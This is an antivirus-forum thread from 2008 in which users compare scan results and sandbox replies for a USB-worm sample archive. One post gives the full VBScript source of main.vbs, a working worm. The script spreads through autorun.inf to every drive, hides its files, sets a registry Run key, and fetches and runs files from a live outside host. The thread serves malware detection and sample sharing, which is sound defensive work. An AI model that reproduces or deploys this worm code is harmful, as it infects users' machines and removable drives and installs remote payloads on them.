（已找到解决办法）08年2月最新最强病毒—calc.exe —极毒极强大~~~

taiw_1144

发现木马
木马名称:Trojan.Win32.Delf.bml

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\RAR$EX00.500\MDBFOBB.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

发现未知木马，是否删除？
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\RAR$EX00.500\SETUP.EXE
木马程序生成以下文件:
1) C:\WINDOWS\SYSREBUILD.EXE
是否删除木马程序及其衍生物?

wangjay1980

detected: virus Virus.VBS.Agent.ai        URL: http://bbs.kafan.cn/attachment.php?aid=199855//.vbs
detected: virus Virus.VBS.Agent.f        URL: http://bbs.kafan.cn/attachment.php?aid=199855//main.vbs
detected: Trojan program Trojan-Downloader.Win32.Agent.dpi        URL: http://bbs.kafan.cn/attachment.p ... SG//PE_Patch.MaskPE
detected: virus Worm.Win32.AutoRun.yf        URL: http://bbs.kafan.cn/attachment.php?aid=199855//Setup.exe

woai_jolin

Hello,

Thanks for taking the time to submit your samples to the Norman
Sandbox Information Center.  Customer delight is our top priority at
Norman.  With that in mind we have developed Sandbox Solutions for
organizations that are committed to speedy analysis and debugging.

Norman Sandbox Solutions give your organization the opportunity to
analyze files immediately in your own environment.

To find out how to bring the power of Norman Sandbox into your test
environments follow the links below.

Norman Sandbox Solutions
[url=wlmailhtml:{60088280-9578-4DD0-820F-97ED7DCD0101}mid://00000048/!x-usc:http://www.norman.com/Product/Sandbox-products/]http://www.norman.com/Product/Sandbox-products/[/url]

Norman Sandbox Analyzer
[url=wlmailhtml:{60088280-9578-4DD0-820F-97ED7DCD0101}mid://00000048/!x-usc:http://www.norman.com/Product/Sandbox-products/Analyzer/]http://www.norman.com/Product/Sandbox-products/Analyzer/[/url]

Norman Sandbox Analyzer Pro
[url=wlmailhtml:{60088280-9578-4DD0-820F-97ED7DCD0101}mid://00000048/!x-usc:http://www.norman.com/Product/Sandbox-products/Analyzer-pro/]http://www.norman.com/Product/Sandbox-products/Analyzer-pro/[/url]

Norman SandBox Reporter
[url=wlmailhtml:{60088280-9578-4DD0-820F-97ED7DCD0101}mid://00000048/!x-usc:http://www.norman.com/Product/Sandbox-products/Reporter/]http://www.norman.com/Product/Sandbox-products/Reporter/[/url]

main.vbs : Not detected by Sandbox (Signature: VBS/Redlof.A@m)


[ DetectionInfo ]
    * Sandbox name: NO_MALWARE
    * Signature name: VBS/Redlof.A@m
    * Compressed: NO
    * TLS hooks: NO
    * Executable type: N/A
    * Executable file structure: OK



(C) 2004-2006 Norman ASA. All Rights Reserved.

The material presented is distributed by Norman ASA as an information source only.


************************************
Sent from an unmonitored email address.
Please DO NOT reply.
************************************

挪威的冬天

vbs miss

信息        2008-02-13  15:59:36        您此次查毒共查出2个病毒以及危险代码                       
信息        2008-02-13  15:59:36        您此次查毒共查了内存模块0个，磁盘引导扇区0个，文件7个                       
信息        2008-02-13  15:59:36        金山毒霸主程序查毒过程结束，查毒方式：命令行查毒                       
病毒        2008-02-13  15:59:36        C:\Users\挪威的冬天\Desktop\超强U盘病毒样本.rar\Setup.exe        Win32.Joke.Rob.a.370688        跳过，未处理       
病毒        2008-02-13  15:59:36        C:\Users\挪威的冬天\Desktop\超强U盘病毒样本.rar\mdbfobb.exe        Win32.Packed.MaskPE        跳过，未处理

woai_jolin

Hello,

Thanks for taking the time to submit your samples to the Norman
Sandbox Information Center.  Customer delight is our top priority at
Norman.  With that in mind we have developed Sandbox Solutions for
organizations that are committed to speedy analysis and debugging.

Norman Sandbox Solutions give your organization the opportunity to
analyze files immediately in your own environment.

To find out how to bring the power of Norman Sandbox into your test
environments follow the links below.

Norman Sandbox Solutions
http://www.norman.com/Product/Sandbox-products/

Norman Sandbox Analyzer
http://www.norman.com/Product/Sandbox-products/Analyzer/

Norman Sandbox Analyzer Pro
http://www.norman.com/Product/Sandbox-products/Analyzer-pro/

Norman SandBox Reporter
http://www.norman.com/Product/Sandbox-products/Reporter/

.vbs : Not detected by Sandbox (Signature: NO_VIRUS)


[ DetectionInfo ]
    * Sandbox name: NO_MALWARE
    * Signature name: NO_VIRUS
    * Compressed: NO
    * TLS hooks: NO
    * Executable type: N/A
    * Executable file structure: OK



(C) 2004-2006 Norman ASA. All Rights Reserved.

The material presented is distributed by Norman ASA as an information source only.

This file is not flagged as malicious by the Norman Sandbox Information Center. However, we can not guarantee that the file is harmless. If you still suspect the file to be malicious and if you urgently need to know for sure, please submit it to your local Norman support department for manual analysis.


************************************
Sent from an unmonitored email address.
Please DO NOT reply.
************************************

leonfg

FS除了inf无视，全k
结果: 发现4个恶意软件
Virus.VBS.Agent.ai (病毒)

• C:\Documents and Settings\GUNDAM\桌面\超强U盘病毒样本.rar\.vbs

Possibly infected with an unknown virus(病毒)

• C:\Documents and Settings\GUNDAM\桌面\超强U盘病毒样本.rar\main.vbs

Trojan-Downloader.Win32.Agent.dpi (病毒)

• C:\Documents and Settings\GUNDAM\桌面\超强U盘病毒样本.rar\mdbfobb.exe

Worm.Win32.AutoRun.yf (病毒)

• C:\Documents and Settings\GUNDAM\桌面\超强U盘病毒样本.rar\Setup.exe

第一次见FS的扫描启发...  Possibly infected with an unknown virus

[ 本帖最后由 leonfg 于 2008-2-13 16:20 编辑 ]

hj5abc

is 不是有禁止创建线程么 wsyscheck 也可以

Sign of "VBS:Malware-gen" has been found in "F:\超强U盘病毒样本.rar\.vbs" file.  
Sign of "VBS:Malware-gen" has been found in "F:\超强U盘病毒样本.rar\autorun.inf" file.  
Sign of "Win32:Agent-ITS [Trj]" has been found in "F:\超强U盘病毒样本.rar\mdbfobb.exe" file.  
Sign of "Win32:AutoRun-CA" has been found in "F:\超强U盘病毒样本.rar\Setup.exe" file.  

zzh161

那个main.vbs要下的链接在我这里打不开。。。
main.vbs的内容

rem sushedaxian070523bengbudaxuecheng
on error resume next
ver="2.0"
dim wsh
dim WshShell
Set Wsh =CreateObject("WScript.Shell")
set WshShell=Wscript.CreateObject("Wscript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
set dir = FSO.GetSpecialFolder(1)
Set dc = FSO.Drives
ouwnname=Wscript.ScriptName
mulu=left(Wscript.ScriptFullName,len(Wscript.ScriptFullName)-len(Wscript.ScriptName))
if mulu=dir&"\" then sys=true
For Each d In dc
if mulu=d&"\" then
return=WshShell.Run(d&"\",3,false)
end if
Next
set y=getobject("winmgmts:\\.\root\cimv2")
set x=y.execquery("select * from win32_process where name='wscript.exe'")  
i=0
for each j in x   
i=i+1
next   
if i>1 then
wscript.quit
end if
If fso.FileExists(mulu&"autorun.inf") Then
Set ReadFile = FSO.OpenTextFile(mulu&"\autorun.inf", 1)
yanzheng=left(ReadFile.ReadAll,11)
set ReadFile=nothing
if yanzheng<>"sushedaxian" then
shuxing mulu&"\autorun.inf",0
buildinf
end If
else
buildinf
End If
If fso.FileExists(mulu&"autorun.exe") and Day(Date)<>1 then
if sys=true then
WshShell.run mulu&"autorun.exe"
end if
Else
downfile mulu&"temp.txt","http://hgz.dinghui123.cn/uvbs.asp",0
Const ForReading = 1  
Set OpenFile = FSO.OpenTextFile(mulu&"temp.txt", ForReading)  
strLine1 = OpenFile.ReadLine
strLine2 = OpenFile.ReadLine
strLine3 = OpenFile.ReadLine
strLine4 = OpenFile.ReadLine
strLine5 = OpenFile.ReadLine
OpenFile.Close  
FSO.DeleteFile(mulu&"temp.txt")
if strLine1=1 then
If strLine2<>ouwnname or strLine2=ouwnname and ver<>strLine5 then
if fso.FileExists(mulu&strLine2) then
shuxing strLine2,0
end if
downfile mulu&strLine2,strLine3,strLine4
end if
end if
End If
if sys=true then
ganran()
else
shuxing mulu&ouwnname,2+4
shuxing dir&"\autorun.inf",0
shuxing dir&"\autorun.exe",0
copyvbs dir&"\main.vbe"
copyvbs dir&"\main.txt"
CopyFile mulu&"autorun.inf",dir&"\"
CopyFile mulu&"autorun.exe",dir&"\"
if mulu<>"C:\" then
shuxing "c:\autorun.inf",0
shuxing "c:\autorun.exe",0
shuxing "c:\main.vbs",0
copyvbs "c:\main.vbs"
shuxing "c:\main.vbs",2+4
CopyFile mulu&"autorun.inf","c:\"
CopyFile mulu&"autorun.exe","c:\"
end if
zhuce
WshShell.run dir&"\main.vbe"
end if
function copyvbs(where)
set self=fso.opentextfile(mulu&ouwnname,1)
vbscopy=self.readall
self.close
set vbs = fso.CreateTextFile(where, True)
vbs.write vbscopy
vbs.close
end function
function zhuce()
RegPath="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\"
Type_Name="REG_SZ"
Key_Name="explorer"
Key_Data="main.vbe"
WshShell.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function
function buildinf()
set ini = fso.CreateTextFile(mulu&"autorun.inf", True)
ini.writeline "sushedaxianbengbubiyeliunian 2007.6.1"
ini.writeline "[AutoRun]"
ini.writeline "open=WScript.exe .\main.vbs"
ini.writeline "shell\open=打开(&O)"
ini.writeline "shell\open\Command=WScript.exe .\main.vbs"
ini.writeline "shell\open\Default=1"
ini.close
shuxing mulu&"autorun.inf",1+2+4
end function
function shuxing(file,change)
if fso.FileExists(file) then
Set oFile = FSO.GetFile(file)
oFile.Attributes = change
Set oFile = Nothing
end if
end function
function downfile(localfile,urlfile,runfile)
iLocal = LCase(localfile):iRemote = LCase(urlfile):
'if 1=2 then Wscript.echo "Impossible!"
Set xPost = CreateObject("Microsoft.XMLHTTP")  
'if 1=2 then Wscript.echo "Impossible!"
xPost.Open "get",iRemote,0
'if 1=2 then Wscript.echo "Impossible!"
xPost.Send()  
'if 1=2 then Wscript.echo "Impossible!"
Set sGet = CreateObject("ADODB.Stream")
'if 1=2 then Wscript.echo "Impossible!"
sGet.Mode = 3
'if 1=2 then Wscript.echo "Impossible!"
sGet.Type = 1  
'if 1=2 then Wscript.echo "Impossible!"
sGet.Open()  
'if 1=2 then Wscript.echo "Impossible!"
sGet.Write(xPost.responseBody)  
'if 1=2 then Wscript.echo "Impossible!"
sGet.SaveToFile iLocal,2
'if 1=2 then Wscript.echo "Impossible!"
shuxing localfile,2+4
if runfile=1 then
Wsh.run iLocal
end if
end function
function copyfile(file,where)
if fso.FileExists(file) then
FSO.CopyFile file,where,True
end if
end function
function ganran()
do
For Each d In dc
If d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
If fso.FileExists(d&"\main.vbs") and fso.FileExists(d&"\autorun.inf") then
Set ReadFile = FSO.OpenTextFile(d&"\autorun.inf", 1)
yanzheng=left(ReadFile.ReadAll,11)
set ReadFile=nothing
if yanzheng="sushedaxian" then
else
shuxing d&"\autorun.inf",0
shuxing d&"\autorun.exe",0
shuxing d&"\main.vbs",0
CopyFile dir&"\autorun.inf",d&"\"
CopyFile dir&"\autorun.exe",d&"\"
CopyFile dir&"\main.txt",d&"\main.vbs"
shuxing d&"\main.vbs",2+4
end if
else
shuxing d&"\autorun.inf",0
shuxing d&"\autorun.exe",0
shuxing d&"\main.vbs",0
CopyFile dir&"\autorun.inf",d&"\"
CopyFile dir&"\autorun.exe",d&"\"
CopyFile dir&"\main.txt",d&"\main.vbs"
shuxing d&"\main.vbs",2+4
end if
End If
next
wscript.sleep 1000
loop
ganran()
end function

无尽藏海

F:\virus\超强U盘病毒样本.rar &raquo; RAR &raquo; autorun.inf - VBS/AutoRun.B worm
F:\virus\超强U盘病毒样本.rar &raquo; RAR &raquo; mdbfobb.exe - a variant of Win32/Delf.NDF worm
F:\virus\超强U盘病毒样本.rar &raquo; RAR &raquo; Setup.exe - Win32/AutoRun.BT worm

剩的上报

卡江东N

终于见到FS的启发发威